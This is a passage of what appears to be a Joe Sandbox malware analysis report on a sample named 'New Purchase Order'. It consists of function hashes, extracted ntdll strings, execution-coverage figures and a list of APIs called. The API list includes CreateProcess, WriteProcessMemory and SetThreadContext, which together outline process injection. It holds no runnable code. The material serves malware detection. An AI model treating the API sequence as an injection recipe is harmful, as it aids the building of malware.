                          • API String ID:
                          • Opcode ID: 18d3a300ec10fedb894c76f062d08a5e396adb78fed7b38f574e6cea89edfc12
                          • Instruction ID: edf6e0503625be2ac2ca333b9eac8525edbb6112fa27c9398cae13d988505dbb
                          • Opcode Fuzzy Hash: 18d3a300ec10fedb894c76f062d08a5e396adb78fed7b38f574e6cea89edfc12
                          • Instruction Fuzzy Hash: 2990022130140402D10671584554606500AD7D1345FD5C012E1425559DC7258A53A632
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cd01ef1a852e65641989298e640d81be187af9e57d08efd6a48d146e7f241465
                          • Instruction ID: e66f376f479d26c56706799206930658035a597e447506a938000973e9e3c4dd
                          • Opcode Fuzzy Hash: cd01ef1a852e65641989298e640d81be187af9e57d08efd6a48d146e7f241465
                          • Instruction Fuzzy Hash: DD90022160140502D10571584544616500B97D0341FD5C022A1025559ECB258A92A631
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c105367a5d3d70a0ef6eed86a78d820ca919336b55d3d9b7166564589a4027e3
                          • Instruction ID: b54223aa7a00700434adbf323c33a3d5e111c4c7ca126ebba89fd18e75632901
                          • Opcode Fuzzy Hash: c105367a5d3d70a0ef6eed86a78d820ca919336b55d3d9b7166564589a4027e3
                          • Instruction Fuzzy Hash: BD90027120140402D14471584544746500697D0301F95C011A5065558EC7598ED56B65
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 03a0ad87e115c9d5c07b61a8787b4e5ffa27a820d2f94d8692f3a58eab655451
                          • Instruction ID: 6498497c6a4c8a21a2afae743e7e90760ff4dea64297f1ba5d6aef359d516fe5
                          • Opcode Fuzzy Hash: 03a0ad87e115c9d5c07b61a8787b4e5ffa27a820d2f94d8692f3a58eab655451
                          • Instruction Fuzzy Hash: B390026120180403D14475584944607500697D0302F95C011A2065559ECB298D516635
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fbc5b04f28f445b461cc515d76b59959f53b86e29ec19ff30eb6f37930588090
                          • Instruction ID: 0689407838a3f23ee21435ee19086291a1d6223a13fad66d50cc1aaa7f9b109a
                          • Opcode Fuzzy Hash: fbc5b04f28f445b461cc515d76b59959f53b86e29ec19ff30eb6f37930588090
                          • Instruction Fuzzy Hash: FD90022120184442D14472584944B0F910697E1302FD5C019A4157558CCA1589555B21
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7d282e602517f907ef8781e669f7f191cbc66270f9df0317a5dd3279609f9981
                          • Instruction ID: a4ec7d274c2e79ecf7b6fcf2be3272270cd2a560ebdff97e9113258183e15ce0
                          • Opcode Fuzzy Hash: 7d282e602517f907ef8781e669f7f191cbc66270f9df0317a5dd3279609f9981
                          • Instruction Fuzzy Hash: D790022124140802D144715885547075007D7D0701F95C011A0025558DC7168A656BB1
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 98a51c00efab5ab88b7132363e2957d8befe71c21d42d9003130d781c13ce3cb
                          • Instruction ID: b8ffa3d532551e614d63730f3b8c5212b59690305002760da328d95396cb7d5e
                          • Opcode Fuzzy Hash: 98a51c00efab5ab88b7132363e2957d8befe71c21d42d9003130d781c13ce3cb
                          • Instruction Fuzzy Hash: 6D90022124545102D154715C45446169006B7E0301F95C021A0815598DC65589556721
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2e38780f3d6aa78e1eb5182de7d1699485b1bab0ae6377647658721f6055e3e6
                          • Instruction ID: 917fcb2337e9529016196da6cbfdae208dd6f1ce9b1334b717b275bac5989c2e
                          • Opcode Fuzzy Hash: 2e38780f3d6aa78e1eb5182de7d1699485b1bab0ae6377647658721f6055e3e6
                          • Instruction Fuzzy Hash: 2B90023120240142954472585944A4E910697E1302BD5D415A0016558CCA1489615721
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d41b96f135b1ba1e0019fb020db0f02eb483502417d053f2729f2c8a638b9b57
                          • Instruction ID: 4bc5c9d2cef2c3f854d9affbae91a1e37418ba52bcb6d2cd08da0540b8d19216
                          • Opcode Fuzzy Hash: d41b96f135b1ba1e0019fb020db0f02eb483502417d053f2729f2c8a638b9b57
                          • Instruction Fuzzy Hash: 0390023520140402D51471585944646504797D0301F95D411A042555CDC75489A1A621
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                          • Instruction ID: c3d9ff23ec76b077a2f15cfd750199da3b790464156c98fe297fd4ebba1c44ad
                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                          • Instruction Fuzzy Hash:
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                          • API String ID: 48624451-2108815105
                          • Opcode ID: 5bf77aa728d805125bf72295290a6d5d5964dd888efb08a024fe8d8f8f8e8e3a
                          • Instruction ID: cc37e49180f413548ee81f9d5e13d1a5f5a4f55caecb2870c3d0f30ff956d979
                          • Opcode Fuzzy Hash: 5bf77aa728d805125bf72295290a6d5d5964dd888efb08a024fe8d8f8f8e8e3a
                          • Instruction Fuzzy Hash: 0651D6B5A00126AFDB19DB9C889097EFBF8BB08240B54C169F4A5D7741E374DE51CBA0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                          • API String ID: 48624451-2108815105
                          • Opcode ID: 8abed2d6751c1c2d1b1c74bb3c18d22c69115dee17a9ea535dd265e65d293e12
                          • Instruction ID: da67e7f9783fb352ef700d6e1ad9e7e1e9c5977a3bb973aa6269a2d92fda421d
                          • Opcode Fuzzy Hash: 8abed2d6751c1c2d1b1c74bb3c18d22c69115dee17a9ea535dd265e65d293e12
                          • Instruction Fuzzy Hash: D751F771A00A45AECB38DF9CC9A497FB7FCEF48204B148459F596D7641D7B4EA408B60
                          Strings
                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 011A46FC
                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 011A4725
                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 011A4787
                          • Execute=1, xrefs: 011A4713
                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 011A4742
                          • ExecuteOptions, xrefs: 011A46A0
                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 011A4655
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                          • API String ID: 0-484625025
                          • Opcode ID: ebd5d986ed8c09039b44047c412c12ed907208090922cd07f57c543f58142f6c
                          • Instruction ID: d9a9773e691f950a2cd5d2d4dca1102d1e2316e7aa7f8d0bd30cc57e8b04e27c
                          • Opcode Fuzzy Hash: ebd5d986ed8c09039b44047c412c12ed907208090922cd07f57c543f58142f6c
                          • Instruction Fuzzy Hash: BF512B75A0021A7AEF2DABA8DC89FED7BBCAF14308F4400A9D605A71C0D7719E518F51
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                          • Instruction ID: f5f5ad136a2f0ed47713143a3873acceb3476d369e33c411d56e8672656871eb
                          • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                          • Instruction Fuzzy Hash: 30022571518342AFD306DF18C490E6BBBF5EFC8704F048A2DBA895B2A5DB31E945CB52
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: __aulldvrm
                          • String ID: +$-$0$0
                          • API String ID: 1302938615-699404926
                          • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                          • Instruction ID: e87b829da64a4df289bf188e32e38dac7825346c8dcde481e7b527deefe42f67
                          • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                          • Instruction Fuzzy Hash: 3D81B170E492499EEF2D8E6CC8917FEBBB2AF45320F184219E961A73D1C7349940CB59
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: %%%u$[$]:%u
                          • API String ID: 48624451-2819853543
                          • Opcode ID: 0ead07fd917343756a7ac2398fe0280e1bc009bf8e2bd6f728a1f95e4b709bf6
                          • Instruction ID: f572883eae0f29f72417f4667828989592dab29e72a39eee629c4133b6cd0ebd
                          • Opcode Fuzzy Hash: 0ead07fd917343756a7ac2398fe0280e1bc009bf8e2bd6f728a1f95e4b709bf6
                          • Instruction Fuzzy Hash: F321777AA00519ABDB18DFB9DC54AFEBBFCEF58644F080116E915E3200E731DA058BA1
                          Strings
                          • RTL: Re-Waiting, xrefs: 011A031E
                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011A02E7
                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011A02BD
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                          • API String ID: 0-2474120054
                          • Opcode ID: 423584949611b0032a72b3b5e5cf1de769f16c7c3c675ad05c09a06d355a4260
                          • Instruction ID: e0d053c941aa2144cbd1ea07f1b375bafa88f03a2a37f4f3b42c2bcb902fa5dd
                          • Opcode Fuzzy Hash: 423584949611b0032a72b3b5e5cf1de769f16c7c3c675ad05c09a06d355a4260
                          • Instruction Fuzzy Hash: 30E1AE34608742DFD769CF28C884B6ABBE0BF88314F144A19F9A58B2D1D774D946CB52
                          Strings
                          • RTL: Re-Waiting, xrefs: 011A7BAC
                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 011A7B7F
                          • RTL: Resource at %p, xrefs: 011A7B8E
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                          • API String ID: 0-871070163
                          • Opcode ID: 52982bf28faee619b422be517120f8a720d295284091f19fd37851e5e8f9249c
                          • Instruction ID: 0f0340d68244a36c2a1ab0c949e06750f4633da15346943c4d6048d20314e695
                          • Opcode Fuzzy Hash: 52982bf28faee619b422be517120f8a720d295284091f19fd37851e5e8f9249c
                          • Instruction Fuzzy Hash: E04125353047028FD72DDE29CC40B6AB7E9EF98710F000A6DE956D7290D732E515CB96
                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011A728C
                          Strings
                          • RTL: Re-Waiting, xrefs: 011A72C1
                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 011A7294
                          • RTL: Resource at %p, xrefs: 011A72A3
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                          • API String ID: 885266447-605551621
                          • Opcode ID: bf1411f63a3b69fd2c788ddc56fdca30c48910cb6df9df98eb1d637c248f524d
                          • Instruction ID: 426ff728e55ffbf004d98fdf61832e05b33bece79f8a7d3df5c6989466f8e0bf
                          • Opcode Fuzzy Hash: bf1411f63a3b69fd2c788ddc56fdca30c48910cb6df9df98eb1d637c248f524d
                          • Instruction Fuzzy Hash: 7E411435704602ABC729DE29CC41BAABBA5FF54714F104629F955DB280DB32E912C7D1
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: %%%u$]:%u
                          • API String ID: 48624451-3050659472
                          • Opcode ID: 03697cde4a287856179004205a6b1cce41b44e11d18344f74e1e46e190366995
                          • Instruction ID: b57f040c31566100830cd5ed3b697b4e109e2838e97a54b3d79c8fe1223d05b4
                          • Opcode Fuzzy Hash: 03697cde4a287856179004205a6b1cce41b44e11d18344f74e1e46e190366995
                          • Instruction Fuzzy Hash: 92318672A006199FDB24DF6DDC54BEEB7FCFB48610F444556E949E3240EB309A448FA0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: __aulldvrm
                          • String ID: +$-
                          • API String ID: 1302938615-2137968064
                          • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                          • Instruction ID: 4619ae4f4e3c9cc16f6257fc296e6d4d84e24bcf2b5af0b623a47560278e07d6
                          • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                          • Instruction Fuzzy Hash: 7491B471E002169BEF2CDF6DC988ABEBBB5EF44720F14451AE965E73C0DB3089408B52
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: $$@
                          • API String ID: 0-1194432280
                          • Opcode ID: 249fc58053526f7134770596893a54a7710b3d2e66548a045fe3f4aaca6d517d
                          • Instruction ID: e5815e54966b6d40d21bdd0ef86c330e109e94c5618c975efb96941d14588da6
                          • Opcode Fuzzy Hash: 249fc58053526f7134770596893a54a7710b3d2e66548a045fe3f4aaca6d517d
                          • Instruction Fuzzy Hash: D0810B72D00269ABDB399F54CC44BEEB7B8AB48754F0041DAEA19B7680D7705E84CFA0

                          Execution Graph

                          Execution Coverage:11.2%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:270
                          Total number of Limit Nodes:17

                          Control-flow Graph

                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 0312D0BE
                          • GetCurrentThread.KERNEL32 ref: 0312D0FB
                          • GetCurrentProcess.KERNEL32 ref: 0312D138
                          • GetCurrentThreadId.KERNEL32 ref: 0312D191
                          Memory Dump Source
                          • Source File: 00000009.00000002.1832880847.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_3120000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: Current$ProcessThread
                          • String ID:
                          • API String ID: 2063062207-0
                          • Opcode ID: 4ef9ca561200882cf394efd27041058d092c76926e9dd9fa5e644b43b913db13
                          • Instruction ID: 20b393610f998f46966e5a7c05ccfebe0b7938770bf8c8d06560b001356e0a05
                          • Opcode Fuzzy Hash: 4ef9ca561200882cf394efd27041058d092c76926e9dd9fa5e644b43b913db13
                          • Instruction Fuzzy Hash: AA5145B09002498FDB14DFA9D948BDEBFF1EF88304F248469E019A7360DB759985CB66

                          Control-flow Graph

                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 0312D0BE
                          • GetCurrentThread.KERNEL32 ref: 0312D0FB
                          • GetCurrentProcess.KERNEL32 ref: 0312D138
                          • GetCurrentThreadId.KERNEL32 ref: 0312D191
                          Memory Dump Source
                          • Source File: 00000009.00000002.1832880847.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_3120000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: Current$ProcessThread
                          • String ID:
                          • API String ID: 2063062207-0
                          • Opcode ID: 1ccefedf324d543484b03b2bed36877c2ada5566e5c7f8fd275fafd2a1db445a
                          • Instruction ID: a85451addd4cd10dded4652adf121b5dcc680a55e01146d68e88beff371cfd1a
                          • Opcode Fuzzy Hash: 1ccefedf324d543484b03b2bed36877c2ada5566e5c7f8fd275fafd2a1db445a
                          • Instruction Fuzzy Hash: 035134B09002498FDB14DFAAD548BDEBFF1AF48304F24C469E419A7360DB759984CF65

                          Control-flow Graph

                          APIs
                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07AB84F6
                          Memory Dump Source
                          • Source File: 00000009.00000002.1854838015.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7ab0000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 20fc9f7f884b8719ecf64a1b5186801c6b2ed9fa1a34f77c7471b088dff0d8cf
                          • Instruction ID: 5a603430dc761fadc75f34795cf44ba9288f5a4dc9ceb5ad042a8d1248cdde3c
                          • Opcode Fuzzy Hash: 20fc9f7f884b8719ecf64a1b5186801c6b2ed9fa1a34f77c7471b088dff0d8cf
                          • Instruction Fuzzy Hash: D4A191B1D0021ADFDB24CF68C880BDDBBBAFF44310F148569E859A7241DB789985CF92

                          Control-flow Graph

                          APIs
                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07AB84F6
                          Memory Dump Source
                          • Source File: 00000009.00000002.1854838015.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7ab0000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 28a48d03456346ab6cfebc2ed9afff9a305d3a197b3f7abe4cd5aa1982b3bf8b
                          • Instruction ID: bd9d5e979bdab597266bacd9f8208cc7a4a69dc1ef75751aafcd175b280e048c
                          • Opcode Fuzzy Hash: 28a48d03456346ab6cfebc2ed9afff9a305d3a197b3f7abe4cd5aa1982b3bf8b
                          • Instruction Fuzzy Hash: B09181B1D0021ADFDB24CF68C881BDDBBB9FF44310F148569D819A7251DB789985CF92

                          Control-flow Graph

                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0312AFFE
                          Memory Dump Source
                          • Source File: 00000009.00000002.1832880847.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_3120000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: 3e133bce4fccaadf7871b86e43ada1c97c4a681f671a12b33baf58f1bb20f0e1
                          • Instruction ID: 4eb2fd7ca56d6cdae1cd3d4905f6e014136853a44b00e0021044568207032b92
                          • Opcode Fuzzy Hash: 3e133bce4fccaadf7871b86e43ada1c97c4a681f671a12b33baf58f1bb20f0e1
                          • Instruction Fuzzy Hash: 22714470A00B158FD724DF29C54475ABBF5FF88200F048A2DD086DBB50DB35E86ACB94

                          Control-flow Graph

                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 031259C9
                          Memory Dump Source
                          • Source File: 00000009.00000002.1832880847.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_3120000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: a2a13326eb6a8404155ccbc3ea242a93425f8675eca117f9911917e094083c9d
                          • Instruction ID: 55a963ea7925c1e9bcda7c6cf03948fa53256c9eaf53ff7c4b7382984af3fe57
                          • Opcode Fuzzy Hash: a2a13326eb6a8404155ccbc3ea242a93425f8675eca117f9911917e094083c9d
                          • Instruction Fuzzy Hash: 5941B2B0C00619CFDB24DFA9C985BDDFBB6BF49304F24806AD408AB255DB756945CF90

                          Control-flow Graph

                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 031259C9
                          Memory Dump Source
                          • Source File: 00000009.00000002.1832880847.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_3120000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: ce939e76afe69ea8f3d9baad8eb608a8fef349ee6ae64d5b4b12fa8381049e0d
                          • Instruction ID: 8c9dd3941f7b672be7d6157765db3eab2957e5fe3cd070b42997eae642907862
                          • Opcode Fuzzy Hash: ce939e76afe69ea8f3d9baad8eb608a8fef349ee6ae64d5b4b12fa8381049e0d
                          • Instruction Fuzzy Hash: 5841B2B0C00629CFDB24DFA9C985B9DFBB6BF49304F24806AD408AB255DBB56945CF90

                          Control-flow Graph

                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07AB80C8
                          Memory Dump Source
                          • Source File: 00000009.00000002.1854838015.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7ab0000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: b4641f7ffbfe7858a4e2dc620f42da51c331f81733b84c1cf730ea0c1a15af10
                          • Instruction ID: 2dacca4badef841eff39b684aaf19da3f8e43874a4c06fcc3302ec20b1be0e51
                          • Opcode Fuzzy Hash: b4641f7ffbfe7858a4e2dc620f42da51c331f81733b84c1cf730ea0c1a15af10
                          • Instruction Fuzzy Hash: 352168B59003099FCB10CFA9C985BEEFBF5FF48320F10842AE918A7251C7789944CBA0

                          Control-flow Graph

                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07AB81A8
                          Memory Dump Source
                          • Source File: 00000009.00000002.1854838015.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7ab0000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 4338a0ee981e44eada0721a160fcae1ebb59afb76d8187733ad31c354ea076e4
                          • Instruction ID: 51d1c7bc9346772cb59cef79f62704edc4b5ff5a17bf5743f9eaee15c81711ec
                          • Opcode Fuzzy Hash: 4338a0ee981e44eada0721a160fcae1ebb59afb76d8187733ad31c354ea076e4
                          • Instruction Fuzzy Hash: 3A217AB18003599FCB10DFA9D940ADEFBF4FF88320F10842AE918A3251C7389940CBA0

                          Control-flow Graph

                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07AB80C8
                          Memory Dump Source
                          • Source File: 00000009.00000002.1854838015.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7ab0000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: a0eab76b7a219b55671e42589f34c5cbbfd002b46baf83c7673285ba19d607fe
                          • Instruction ID: 81896897c87c9704fcea447f01f1fde98f677d13cc7844262ecfa4f179f208a5
                          • Opcode Fuzzy Hash: a0eab76b7a219b55671e42589f34c5cbbfd002b46baf83c7673285ba19d607fe
                          • Instruction Fuzzy Hash: 272157B19003599FCB10CFA9C984BDEBBF5FF48310F108429E918A7251C7789944CBA4
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07AB7AE6
                          Memory Dump Source
                          • Source File: 00000009.00000002.1854838015.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7ab0000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
